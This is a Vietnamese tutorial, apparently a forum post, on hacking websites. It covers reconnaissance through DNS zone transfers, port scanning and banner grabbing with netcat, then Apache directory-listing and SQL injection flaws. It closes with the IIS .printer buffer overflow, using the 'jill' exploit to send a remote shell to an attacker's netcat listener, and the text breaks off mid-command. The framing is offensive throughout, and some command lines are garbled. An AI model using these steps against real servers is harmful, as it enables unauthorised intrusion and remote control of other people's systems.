Căn bản để Hack Web Hiện nay hack web rất chi là fổ biến.Xin giới thiệu sơ qua về vấn đề hack web. Phương pháp chung : -Tìm hiểu sơ lược về các thành phần site cần hack: Cái này bạn sẽ đi thu lượm các thông tin về cấu trúc ,thành phần của site như phương pháp chuyển giao dữ liệu,thông qua những cổng nào,có bao nhiêu server,nền ứng dụng,... -Tấn công web server: đã có nhiều lỗ hổng trên các server cùng với kịch bản khai thác được công bố một cách công khai trên nhiều trang.Bạn có thể kiểm tra,nếu admin server đó mà chưa fix lỗi thì đó là một cơ hội tốt để khai thác. -Xem xét các ứng dụng
em loại nào đang chạy trên server như asp,php,cgi,,java,... cấu trúc thư mục,các cơ sở dữ liệu -Tấn công vào cơ chế xác thực :mạo danh cookie,đoán password,.. -Tấn công hệ thống cấp phép: khi đã có được quyền user thì đây là bước cần thiết.Có một số biện pháp thông dụng như leo thang đặc quyền,làm thay đổi các giá trị cookie -> thay quyền user,tấn công vào sql server. -Phân tích các chức năng các ứng dụng web:thường thấy với tấn công bằng phê chuẩn đầu vào -Khai thác việc kết nối cơ sở dữ liệu: thông thường các nhà phát triển ứng dụng web thường chọn tính đơn giản hơn là an toàn,điều này dẫn đến việc xuất dữ liệu nhạy cảm từ sql server xuống trình duyệt của client.Điển hình sql injection. -Attack the client: như cross-site scripting -Tấn công từ chối dịch vụ : một lổ hổng lớn và đáng sợ. Chúng ta sẽ bắt đầu từ phần 1 , cũng có thể nói là kĩ thuật in dấu chân mạng.Đầu tiên hãy bắt đầu tìm hiểu về nền và loại ứng dụng mà server đang chạy.Web application chạy ở trên server và trả lại kết quả xuống client qua trình duyệt web. Với các công cụ whois các bạn có thể tìm ra các địa chỉ ip được gán,các dữ liệu liên quan tới dns cùng các thông tin về admin và liên lạc.Hiện có nhiều công cụ whois,song các bạn có thể tham khảo tại http://www.arin.net/whois. Truy vấn cơ sở dữ liệu bởi whois có thể định danh dns server của một tổ chức.Nếu được thiết lập không đúng nó có thể cho phép người dùng nặc danh lấy thông tin như ip mapping với domain name.Để ngăn cản điều này có thể ngăn cản việc backup dns server nơi chứa các file cấu hình vùng.Nếu chức năng này không được thiết lập thì thông tin có thể bị đổ bởi việc thực hiện chuyển vùng. Thực hiện chuyển vùng đơn giản chỉ sử dụng nslookup ,một tiện ích thường cài sẵn trong mọi nền hệ điều hành.Ví dụ trên windows: C:one transfer slookup Default Server: internal Address: 10.1.1.65 > server ns1.victim.com Default Server: ns1.victim.com Address: 192.168.15.77 > ls -d victim.com @ IN SOA victim.com. root.freebsd.victim.com. ( 961230 ; Serial 3600 ; Refresh 300 ; Retry 3600000 ; Expire 3600 ) ; Minimum IN NS freebsd.victim.com. mail.victim.com. IN MX 10.0.0.10 ; mail www.victim.com. IN A 10.0.0.2 ; web app.victim.com. IN A 10.0.0.1 ; web app 1 vvvvvvvvvv... từ ví dụ này có thể thấy rằng ta có thể truy cập qua dns vào các application server. Tiếp đó hãy sử dụng các công cụ quét cổng khám phá các cổng mở trên server.Mỗi cổng chính là địa chỉ của một ứng dụng nhất định hay nói cách khác là địa chỉ của chúng trên server.Các bạn tham khảo về giao thức sử dụng,địa chỉ và tên ứng dụng đang chạy trên server trong diễn đàn.Có thể hình dung công cụ quét cổng sẽ kết nối tới một cổng xác định của giao thức tcp hay udp và xác định tên ứng dụng theo kịch bản.Tuy vậy cũng có một số kĩ thuật quét cổng cùng công cụ đi kèm như tcp syn scan,tcp scan,các kĩ thuật quét udp,quét với nmap...song tôi sẽ không đề cập ở đây vì bài này chỉ mang tính chất giới thiệu. Sau khi thiết lập danh sách các dịch vụ bạn cần xác định platform của server.Kĩ thuật chộp banner với netcat có thể được thực hiện như ví dụ: C: c -nvv 192.168.234.34 80 { chỉ mang tính chất ví dụ} (UNKOWN) [192.168.234.34] 80 open ? HEAD /HTTP 1.1 Windows platform/iis server có thể thấy ở trên là server sử dụng iis trên nền windows. Một số công cụ như netcat,fscan,.. không thể kết nối tới SSL service để chộp banner,một trong những cách đơn giản nhất là sử dụng một local proxy.Có vài tool khá tốt cho công việc này,nhưng tôi thấy hay hơn là dùng sslproxy. C:>sslproxy -1 5000 -R www.victim.com -r 443 -c dummycert.pem -p ssl23 SSL: No verify locations, trying default proxy ready, listening for connections sslproxy lắng nghe cục bộ trên cổng 5000 và proxy kết nối tới remote server trên cổng 443.Giờ đây có thể mở một cmd shell kết nối tới local host trên port 5000 sử dụng netcat và chộp thông tin banner như sau: C: c>nc -vv localhost 5000 localhost [127.0.0.1] 5000 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 15 Feb 2002 16:47:56 GMT Server: WebSTAR/4.2 (Unix) mod_ssl/2.8.6 OpenSSL/0.9.6c Connection: close Content-Type: text/html Hãy chuyển sang cửa sổ của sslproxy và chúng ta sẽ thấy kết nối đã được mở ( over ssl ,port 443) ,netcat session đã có được một kết nối tới nó: connection on fd=412 SSL: Cert error: unknown error 20 in /C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Server CA/[email protected] SSL: negotiated cipher: EDH-RSA-DES-CBC3-SHA client: broken pipe (read) Các bạn cũng có thể thử với stunnel và openssl ,nó cũng tương tự như trên Đây là link down http://www.stunnel.org/download/stunnel/win32/ Chú ý khi chạy nếu chương trình đòi các file dll thì các bạn có thể tìm tại http://www.stunnel.org/download/stun...puter/stunnel/ Tiếp tục đi chi tiết @-Giờ đây chúng ta chuyển qua bàn về vấn đề hack web server.Việc tấn công này theo tôi biết có thể gồm:Sử dụng các lổ hổng cốt yếu đã biết của các ứng dụng cũng như platform,thứ hai là sử dụng các công cụ quét lỗ hổng tự động đã được tạo ( nhiều công cụ sẽ làm gần như hết cho bạn ,và bạn có thể bổ sung danh sách code vào list code của nó),thứ ba là tấn công từ chối dịch vụ webserver. Đầu tiên xin nói về các lỗ hổng cố yếu. A.Lỗ hổng webserver sử dụng apache: một url dài có thể khiến apache nhả ra nội dung cấu trúc các thư mục ,ví dụ: http://victim.com/cgi-bin///////////...////////////// (chú ý là thường apache server ko thể xử lí các url có quá 8000 kí tự). Lỗ hổng này chỉ có thể dùng với version trước 1.3.19 ,từ version apache 1.3.19 nó đã được fix.Nhưng hãy nhớ là các module mod_dir,mod_autoindex thường là mặc định tồn tại trên server.Script sau có thể đảm bảo cho server: [rohan apache]$ ./configure --disable-module=dir --disable-module=autoindex Ngoài ra với lỗ hổng Multiview trên apache ,có thể thực hiện trực ttiếp trên url hoặc là từ cmd line sử dụng netcat: [rohan]$ echo –e "GET /some_directory?M=D HTTP/1.0 " | > nc 192.168.42.17 80

Index of /some_directory

 Name  Last modified Size Description  
  Parent Directory 20-Oct-1998 08:58 -  cgi-bin/ 28-Oct-1998 05:06 -  messages/ 20-Oct-1998 08:58 -  wwwboard.html 16-Apr-1998 19:43 1k  passwd.txt 16-Apr-1998 19:30 1k  data.txt 16-Apr-1998 19:29 1k  faq.html 16-Apr-1998 19:28 2k  

---

Nếu may mắn ta có thể kiếm được nhiều thứ ở đây. Cách phòng chống là không nên để những thứ nhạy cảm ở đây. Lỗ hổng mod_rewirite có thể cho phép hacker có các thong tin về thừ mục trên server ,thường là do sự map local page với đường dẫn đầy đủ.Các bạn xem thử: /more-icons/(.*) /home/httpd/icons/$1 Nếu mode này đã được fix :/more-icons/(.*) /icons/$1 Cách fix đơn giản là hãy dùng các đường dẫn tương đối. mod_auth_*sqlinjection : việc chèn dấu ` ( dấu nháy đơn) vào request có thể khiến ta có được một câu lệnh sql tuỳ ý. Cách fix lỗi này là nâng cấp gói mod_auth_*sql và nếu cần thiết hãy restart lại apache server. B.Microsoft Internet Information Server -IIS Microsoft vẫn nổi tiếng với đặc tính nhiều lỗ hỗng ,dễ dãi hơn trong các việc trao đổi dữ liệu.Tấn công này có thể chia thành :Tấn công vào các thành phần của iis,Tấn công chính iis. Thứ nhất là tấn công vào thành phần của nó.Như biết,IIS dùng nhiều file dll chạy cùng nó trên server .Đây chính là lỗ hổng dẫn tới các tấn công như server-sidescript execution,content indexing,web-based printing ,..vv.Hãy xem về tràn bộ đệm ISAPI DLL: Lỗ hổng này xảy ra khi bộ đệm xấp xỉ 420 byte được gửi đi kèm theo http host: header của một yêu cầu .printer ISAPI ,như ví dụ ,khi [buffer] cỡ 420 kí tự: GET /NULL.printer HTTP/1.0 Host: [buffer] Điều này sẽ gây ra tràn bộ đệm và thông thường sẽ tắt IIS ngay tức khắc.Tuy nhiên Window 2000 sẽ tự động khởi động lại IIS (inetinfo.exe).Chú ý rằng một web site default trên victim server dừng lại nếu shell hiện thời là không thể connect (shell đang làm việc trên server),nếu nó không được tắt cẩn thận,hoặc nếu có một vài lỗi xảy ra.Cố gắng khởi động web site từ console trên victim server sẽ fail,và machine của server cần được reboot để cứu lại dữ liệu từ điều kiện này. Hãy xem khai thác dưới làm việc.Đầu tiên khởi động một listener trên hệ thống của attacker( chúng ta?)-ở đây là netcat: C:>nc -vv -l -p 2002 listening on [any] 2002 ... sau đó đưa vào đích khai thác tại attacker `s listener: C:>jill 192.168.234.222 80 192.168.234.250 2002 iis5 remote .printer overflow. dark spyrit / beavuh labs. connecting... sent... you may need to send a carriage on your listener if the shell doesn`t appear. have fun! Nếu tất cả diễn ra theo đúng dự định thì một khoảng thời gian ngắn sau khi các dòng lệnh làm việc,một remote shell sẽ hiện ra trên listener của attacker.Lưu ý là bạn phải làm cho shell xuất hiện khi bạn nhìn thấy kết nối đã được nhận-và sau mỗi lệnh tiếp theo cũng phải làm vậy( nhắc lại rằng điều này xuất hiện trên attacker`s system).Đơn giản chỉ như sau: C:>nc -vv -l -p